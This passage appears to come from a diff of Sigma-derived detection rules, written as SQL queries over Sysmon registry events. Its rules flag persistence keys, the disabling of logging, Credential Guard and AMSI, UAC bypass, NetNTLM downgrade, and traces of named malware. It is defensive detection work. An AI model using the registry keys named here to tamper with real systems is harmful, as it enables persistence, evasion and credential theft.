'%\\\\SOFTWARE\\\\Classes\\\\Protocols\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Classes\\\\Htmlfile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Environment\\\\UserInitMprLogonScript%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Internet Explorer\\\\UrlSearchHooks%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Internet Explorer\\\\Desktop\\\\Components%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Classes\\\\Clsid\\\\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\\\\Inprocserver32%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control Panel\\\\Desktop\\\\Scrnsave.exe%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((TargetObject LIKE '%\\\\Office\\\\ClickToRun\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ClickToRunStore\\\\HKMU\\\\SOFTWARE\\\\Classes\\\\PROTOCOLS\\\\Handler\\\\%' ESCAPE '\\') OR Details IN ('{314111c7-a502-11d2-bbca-00c04f8ec294}', '{3459B272-CC19-4448-86C9-DDC3B4B2FAD3}', '{42089D2D-912D-4018-9087-2B87803E93FB}', '{5504BE45-A83B-4808-900A-3A5C36E7F77A}', '{807583E5-5146-11D5-A672-00B0D022E945}')) OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{8A69D345-D564-463c-AFF1-A69D9E530F96}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{9459C573-B17A-45AE-9F64-1857B5D58CEE}\\\\%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Active Setup\\\\Installed Components\\\\{89820200-ECBD-11cf-8B85-00AA005B4383}\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program 
Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" ], - "filename": "registry_set_asep_reg_keys_modification_common.yml" + "filename": "registry_event_malware_qakbot_registry.yml" }, { - "title": "WinSock2 Autorun Keys Modification", - "id": "d6c2ce7e-afb5-4337-9ca4-4b5254ed0565", + "title": "Disable Security Events Logging Adding Reg Key MiniNt", + "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", "status": "test", - "description": "Detects modification of autostart extensibility point (ASEP) in registry.", - "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", + "description": "Detects the addition of a key 'MiniNt' to the registry. 
Upon a reboot, Windows Event Log service will stopped write events.", + "author": "Ilyas Ochkov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", - "Legitimate administrator sets up autorun keys for legitimate reason" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Services\\\\WinSock2\\\\Parameters%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Protocol\\_Catalog9\\\\Catalog\\_Entries%' ESCAPE '\\' OR TargetObject LIKE '%\\\\NameSpace\\_Catalog5\\\\Catalog\\_Entries%' ESCAPE '\\')) AND NOT (Details = '(Empty)' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\MsiExec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" ], - "filename": "registry_set_asep_reg_keys_modification_winsock2.yml" + "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" }, { - "title": "New Root or CA or AuthRoot Certificate to Store", - "id": "d223b46b-5621-4037-88fe-fda32eead684", - "status": "experimental", - "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", - "author": "frack113", + "title": "Registry Entries For Azorult Malware", + "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "status": "test", + "description": "Detects the 
presence of a registry key created during Azorult execution", + "author": "Trent Liffick", "tags": [ - "attack.impact", - "attack.t1490" + "attack.execution", + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND Details = 'Binary Data')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" ], - "filename": "registry_set_install_root_or_ca_certificat.yml" + "filename": "registry_event_mal_azorult.yml" }, { - "title": "IE Change Domain Zone", - "id": 
"45e112d0-7759-4c2a-aa36-9f8fb79d3393", - "status": "experimental", - "description": "Hides the file extension through modification of the registry", - "author": "frack113", + "title": "DLL Load via LSASS", + "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", + "status": "test", + "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1137" + "attack.t1547.008" ], "falsepositives": [ - "Administrative scripts" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (Details IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR Details LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" ], - "filename": "registry_set_change_security_zones.yml" + "filename": "registry_event_susp_lsass_dll_load.yml" }, { - "title": "CVE-2021-31979 CVE-2021-33771 Exploits", - "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", - "status": "experimental", - "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", - "author": "Sittikorn S, frack113", + "title": 
"Suspicious Run Key from Download", + "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", + "status": "test", + "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1566", - "attack.t1203", - "cve.2021.33771", - "cve.2021.31979" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Software installers downloaded and used by users" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((Details LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR Details LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" ], - "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" + "filename": "registry_event_susp_download_run_key.yml" }, { - "title": "Potential AutoLogger Sessions Tampering", - "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", - "status": "experimental", - "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Pandemic 
Registry Key", + "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", + "status": "test", + "description": "Detects Pandemic Windows Implant", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.lateral_movement", + "attack.t1105" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" ], - "filename": "registry_set_disable_autologger_sessions.yml" + "filename": "registry_event_apt_pandemic.yml" }, { - "title": "Suspicious Set Value of MSDT in Registry (CVE-2022-30190)", - "id": "2d9403d5-7927-46b7-8216-37ab7c9ec5e3", + "title": "UAC Bypass Via Wsreset", + "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", "status": "test", - "description": "Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190.", - "author": "Sittikorn S", + "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. 
It will run a binary file contained in a low-privilege registry.", + "author": "oscd.community, Dmitry Uchakin", "tags": [ "attack.defense_evasion", - "attack.t1221" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKCR\\\\ms-msdt\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" ], - "filename": "registry_set_cve_2022_30190_msdt_follina.yml" + "filename": "registry_event_bypass_via_wsreset.yml" }, { - "title": "Potential AMSI COM Server Hijacking", - "id": "160d2780-31f7-4922-8b3a-efce30e63e96", - "status": "experimental", - "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. 
This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Wdigest CredGuard Registry Modification", + "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", + "status": "test", + "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" ], - "filename": "registry_set_amsi_com_hijack.yml" + "filename": "registry_event_disable_wdigest_credential_guard.yml" }, { - "title": "Potential Persistence Via Excel Add-in - Registry", - "id": "961e33d1-4f86-4fcf-80ab-930a708b2f82", + "title": "Registry Persistence Mechanisms in Recycle Bin", + "id": "277efb8f-60be-4f10-b4d3-037802f37167", "status": "experimental", - "description": "Detect potential persistence via the creation of an excel add-in (XLL) file to make it run automatically when Excel is started.", + "description": "Detects persistence registry keys for Recycle Bin", "author": "frack113", "tags": [ "attack.persistence", - "attack.t1137.006" + "attack.t1547" ], 
"falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Excel\\\\Options' ESCAPE '\\' AND Details LIKE '/R %' ESCAPE '\\' AND Details LIKE '%.xll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_xll.yml" + "filename": "registry_event_persistence_recycle_bin.yml" }, { - "title": "Disable Administrative Share Creation at Startup", - "id": "c7dcacd0-cc59-4004-b0a4-1d6cdebe6f3e", + "title": "OceanLotus Registry Activity", + "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", "status": "test", - "description": "Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system", - "author": "frack113", + "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", + "author": "megan201296, Jonhnathan Ribeiro", "tags": [ "attack.defense_evasion", - "attack.t1070.005" + "attack.t1112" + ], + "falsepositives": [ + "Unknown" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + ], + "filename": "registry_event_apt_oceanlotus_registry.yml" + }, + { + "title": "FlowCloud Malware", + "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", + "status": "test", + "description": "Detects FlowCloud malware from threat group TA410.", + "author": "NVISO", + "tags": [ + "attack.persistence", + "attack.t1112" ], "falsepositives": [ "Unknown" ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + ], + "filename": "registry_event_mal_flowcloud.yml" + }, + { + "title": "Office Application Startup - Office Test", + "id": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", + "status": "test", + "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be 
executed every time an Office application is started", + "author": "omkar72", + "tags": [ + "attack.persistence", + "attack.t1137.002" + ], + "falsepositives": [ + "Unlikely" + ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%AutoShareWks' ESCAPE '\\' OR TargetObject LIKE '%AutoShareServer' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\Software\\\\Microsoft\\\\Office test\\\\Special\\\\Perf' ESCAPE '\\'))" ], - "filename": "registry_set_disable_administrative_share.yml" + "filename": "registry_event_office_test_regadd.yml" }, { - "title": "Tamper With Sophos AV Registry Keys", - "id": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "status": "experimental", - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "NetNTLM Downgrade Attack - Registry", + "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "status": "test", + "description": "Detects NetNTLM downgrade attack", + "author": "Florian Roth (Nextron Systems), wagga", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.001", + "attack.t1112" ], "falsepositives": [ - "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Sophos Endpoint 
Defense\\\\TamperProtection\\\\Config\\\\SAVEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos Endpoint Defense\\\\TamperProtection\\\\Config\\\\SEDEnabled%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Sophos\\\\SAVService\\\\TamperProtection\\\\Enabled%' ESCAPE '\\') AND Details = 'DWORD (0x00000000)')" + "SELECT * FROM logs WHERE (EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" ], - "filename": "registry_set_sophos_av_tamper.yml" + "filename": "registry_event_net_ntlm_downgrade.yml" }, { - "title": "Registry Persitence via Service in Safe Mode", - "id": "1547e27c-3974-43e2-a7d7-7f484fb928ec", + "title": "HybridConnectionManager Service Installation - Registry", + "id": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", "status": "experimental", - "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", - "author": "frack113", + "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.defense_evasion", - "attack.t1564.001" + "attack.resource_development", + "attack.t1608" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'Setvalue' AND (TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\%' ESCAPE 
'\\') AND TargetObject LIKE '%\\\\(Default)' ESCAPE '\\' AND Details = 'Service') AND NOT ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Minimal\\\\SAVService\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\SafeBoot\\\\Network\\\\SAVService\\\\(Default)' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE '%\\\\Services\\\\HybridConnectionManager%' ESCAPE '\\' OR (EventType = 'SetValue' AND Details LIKE '%Microsoft.HybridConnectionManager.Listener.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_add_load_service_in_safe_mode.yml" + "filename": "registry_event_hybridconnectionmgr_svc_installation.yml" }, { - "title": "UAC Bypass Using Windows Media Player - Registry", - "id": "5f9db380-ea57-4d1e-beab-8a2d33397e93", + "title": "Run Once Task Configuration in Registry", + "id": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", "status": "test", - "description": "Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)", - "author": "Christian Burkard (Nextron Systems)", + "description": "Rule to detect the configuration of Run Once registry key. 
Configured payload can be run by runonce.exe /AlternateShellStartup", + "author": "Avneet Singh @v3t0_, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1112" ], "falsepositives": [ - "Unknown" + "Legitimate modification of the registry key by legitimate program" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Compatibility Assistant\\\\Store\\\\C:\\\\Program Files\\\\Windows Media Player\\\\osk.exe' ESCAPE '\\' AND Details = 'Binary Data')" + "SELECT * FROM logs WHERE ((EventID IN ('12', '13', '14') AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Active Setup\\\\Installed Components%' ESCAPE '\\' AND TargetObject LIKE '%\\\\StubPath' ESCAPE '\\') AND NOT ((Details LIKE '\"C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Installer\\\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level%' ESCAPE '\\') OR ((Details LIKE '\"C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' OR Details LIKE '\"C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\') AND Details LIKE '%\\\\Installer\\\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable' ESCAPE '\\')))" ], - "filename": "registry_set_uac_bypass_wmp.yml" + "filename": "registry_event_runonce_persistence.yml" }, { - "title": "Disable Macro Runtime Scan Scope", - "id": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", - "description": "Detects tampering with the MacroRuntimeScanScope registry key to disable runtime scanning of enabled macros", - "status": "experimental", - "author": "Nasreddine Bencherchali (Nextron 
